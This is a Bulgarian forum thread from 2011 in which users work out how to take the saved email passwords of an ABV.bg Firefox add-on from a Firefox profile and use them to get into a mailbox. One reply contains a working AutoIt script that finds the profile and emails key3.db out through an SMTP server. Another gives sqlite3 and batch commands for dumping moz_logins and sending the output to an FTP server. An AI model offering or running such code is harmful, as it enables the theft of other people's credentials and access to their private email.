download.bg
 Вход Списание  Новини  Програми  Статии  Форум  Чат   Абонамент  Топ95   Архив 

Форум » Системни администратори и хакери » Предизвикателство - добавка за лисицата от АБВ!

Предизвикателство - добавка за лисицата от АБВ!

< 1 2 3 >

Автор
Съобщение
programings
Съб, 29.10.11, 19:26
Преди няколко дни, докато си проверявах пощата, една реклама на заглавната страница ме заинтригува!

Ставаше дума за добавка за лисицата, която през даден интервал от време проверява за новопристигнали писма, и известява потребителя!

Тук е мястото да отбележа, че става дума за АБВ!

Повече информация за добавката!

Стори ми се удобно, и си я сложих!

Изглед на менюто за настройка!
Изглед на менюто за настройка!

Още при настройката обаче, когато бях подканен да въведа парола на емайла си, в главата ми се отвориха няколко въпроса :
1. Тази добавка изисква парола, следователно ще я запише, и ще я ползва занапред, без да се налага всеки път да я въвеждам!

2. Щом я записва, къде става това, кодира ли се паролата, и в каква кодировка?

Няколко дни се мъчих да разбера къде се записват въпросните данни, но без успех!

Факт е, че когато се изчисти кеша на браузъра през CCleaner, всякаква настройка на добавката изчезва!

Предизвикателството е да успеем да намерим къде се съхраняват паролите, да разберем в каква кодировка са, да ги трансформираме в нормален вид, и следователно да намажем!

редактиран от programings на 29.10.11 19:27
редактиран от programings на 29.10.11 19:28
редактиран от programings на 29.10.11 19:32
Отговор  За печат  
plamil
Съб, 29.10.11, 21:22
Най вероятно в потребитлските ти файлове, някой с разширение sqlite ти помни паролите.
Успех с разкодирането
Отговор  За печат  
dreamskill
Съб, 29.10.11, 21:37
Вероятно е да е в signons.sqlite.
Например gm notifier записва паролите в signons.sqlite като за сайт посочва "chrome://gm-notifier/ (gm-notifier)".
Отговор  За печат  
programings
Съб, 29.10.11, 21:48
Възможно ли е да се разкодират такива файлове?
редактиран от programings на 29.10.11 21:48
Отговор  За печат  
dreamskill
Съб, 29.10.11, 22:41
трябва ти key3.db
Отговор  За печат  
anonymous
Нед, 30.10.11, 01:17
Хмм... programings ай да мислим... Мозила си съхранява настройкит тук

ХР
C:\Documents and Settings\УСЕР\Application Data\Mozilla\Firefox\Profiles\ПРОМЕНЛИВА.default

Win 7/Vista
C:\Users\УСЕР\AppData\Roaming\Mozilla\Firefox\Profiles\ПРОМЕНЛИВА.default

Та ако изтрием тази папка се губи всичко и това довежда до въпроса че там се крие. Та взимаме и преименуваме всеки файл по отделно. Крайния резултат ще бъде че ако преименуваме нужния файл ще се изгуби паролата и настройките то тогава ще знаем че този е файла и хоп решението е ясно...

Сега остава декодиране НО ние нямаме толкова време за да губим за декодиране и ще вземем този файл и ще го пуснем в горепосочената папка в нашия компютър и в крайна сметка без да се мъчим ще получим достъп до пощата...

Едит:

Друго среднощно прозрение... Изтегляш плъгина слагаш му .zip разширение де архивираш го и се ровиш в скриптовете с цел да узнаеш къде какво прави...

П.С.
Лека вечер и не забравяйте да върнете часовниците с час назад (как го мразя това местене на времето).

редактиран от anonymous на 30.10.11 01:24
Отговор  За печат  
programings
Нед, 30.10.11, 08:50
Мерси за просветлението, armenxxx1 !

След редица тестове установих, че действително цялата нужна информация се съхранява в signons.sqlite !

Сега остава само да го взема и заменя - детска игра!

Послепис : Явно не става така лесно работата, както си го мислих аз!

Доста търсих, и в крайна сметка не успях да намеря свестен скрипт, например VBS, който да претърсва целият дял за файлове с разширение sqlite, и след като намери да ми ги изпраща на емайла като прикачени файлове!

Идеи?

редактиран от programings на 30.10.11 12:19
Отговор  За печат  
anonymous
Нед, 30.10.11, 13:03

RE: Предизвикателство - добавка за лисицата от АБВ!

Цитат на programings от Неделя, 30.10.2011 08:50
” Мерси за просветлението, armenxxx1 !

След редица тестове установих, че действително цялата нужна информация се съхранява в signons.sqlite !

Сега остава само да го взема и заменя - детска игра!

Послепис : Явно не става така лесно работата, както си го мислих аз!

Доста търсих, и в крайна сметка не успях да намеря свестен скрипт, например VBS, който да претърсва целият дял за файлове с разширение sqlite, и след като намери да ми ги изпраща на емайла като прикачени файлове!

Идеи? „

Не мисля че само ще ти помогне само този файл... Преди време един човек ми зададе подобен въпрос и му написах този скрипт на Autoit разгледай го ще ти помогне и остави тези скриптове на VBS
#Include <File.au3>
#Include <Array.au3>
$path = @AppDataDir & "MozillaFirefoxProfiles\"
$FileList = _FileListToArray($path, "*.default", 2)
$path2 = $path & $FileList[1]
 
$str = "http://schemas.microsoft.com/cdo/configuration/"
$hMAIL = ObjCreate ("CDO.Message")
    With $hMAIL
        .From = "user@mail.ru" ;Имейла от когото изпращате
        .To = "test@abv.bg" ;Имейла на когото ще изпращате
      .Subject = "Otnosno" ;Относно
        .TextBody = "Tekst v emaila" ;Текст на имейла
        .AddAttachment ($path2 & "key3.db") ;Файл за изпращане
    EndWith
    With $hMAIL.Configuration.Fields
        .Item ($str & "sendusing") = 2
        .Item ($str & "smtpserver") = "smtp.mail.ru" ;smtp сървар
        .Item ($str & "smtpauthenticate") = 1
        .Item ($str & "sendusername") = "user@mail.ru" ;Имейла на smtp сървара
        .Item ($str & "sendpassword") = "pss" ;Парола на smtp сървара
        .Item ($str & "smtpserverport") = 2525 ;Порт
        .Update
    EndWith
$hMAIL.Send

Отговор  За печат  
phrozencrew
Нед, 30.10.11, 13:15
Няма нужда да се копира целия signons.sqlite, ако трябват само определени полета от него. Всъщност можеш да се оправиш и с Batch или bash, без vbs. Щом имаш достъп да стартираш vbs, тогава можеш да намърдаш SQLite
sqlite3.exe signons.sqlite "select * from moz_logins" > log.txt

И да си изпратиш само необходимите текстове на FTP-то.

Ако държиш да вземеш претърсваш за sqlite-файлове, няма нужда да преравяш цялата машина. Много по-добре е да преровиш съдържанието на:
cd %APPDATA%\Mozilla\Firefox\Profiles\
dir /b/s signons.sqlite

или без да сменяш директорията:
set a="%APPDATA%\Mozilla\Firefox\Profiles\"
dir /b/s %a% | findstr signons

Отговор  За печат  
anonymous
Нед, 30.10.11, 13:30

RE: Предизвикателство - добавка за лисицата от АБВ!

Цитат на phrozencrew от Неделя, 30.10.2011 13:15
” Няма нужда да се копира целия signons.sqlite, ако трябват само определени полета от него. Всъщност можеш да се оправиш и с Batch или bash, без vbs. Щом имаш достъп да стартираш vbs, тогава можеш да намърдаш SQLite
sqlite3.exe signons.sqlite "select * from moz_logins" > log.txt

И да си изпратиш само необходимите текстове на FTP-то.

Ако държиш да вземеш претърсваш за sqlite-файлове, няма нужда да преравяш цялата машина. Много по-добре е да преровиш съдържанието на:
cd %APPDATA%MozillaFirefoxProfiles
dir /b/s signons.sqlite

или без да сменяш директорията:
set a="%APPDATA%MozillaFirefoxProfiles"
dir /b/s %a% | findstr signons

Нед след извличането по този начин паролите са криптирани... Имаш ли идеи за декриптиране ?

Отговор  За печат  

< 1 2 3 >

Коментар

за нас | за разработчици | за реклама | станете автори | in english  © 1998-2024   Experta Ltd.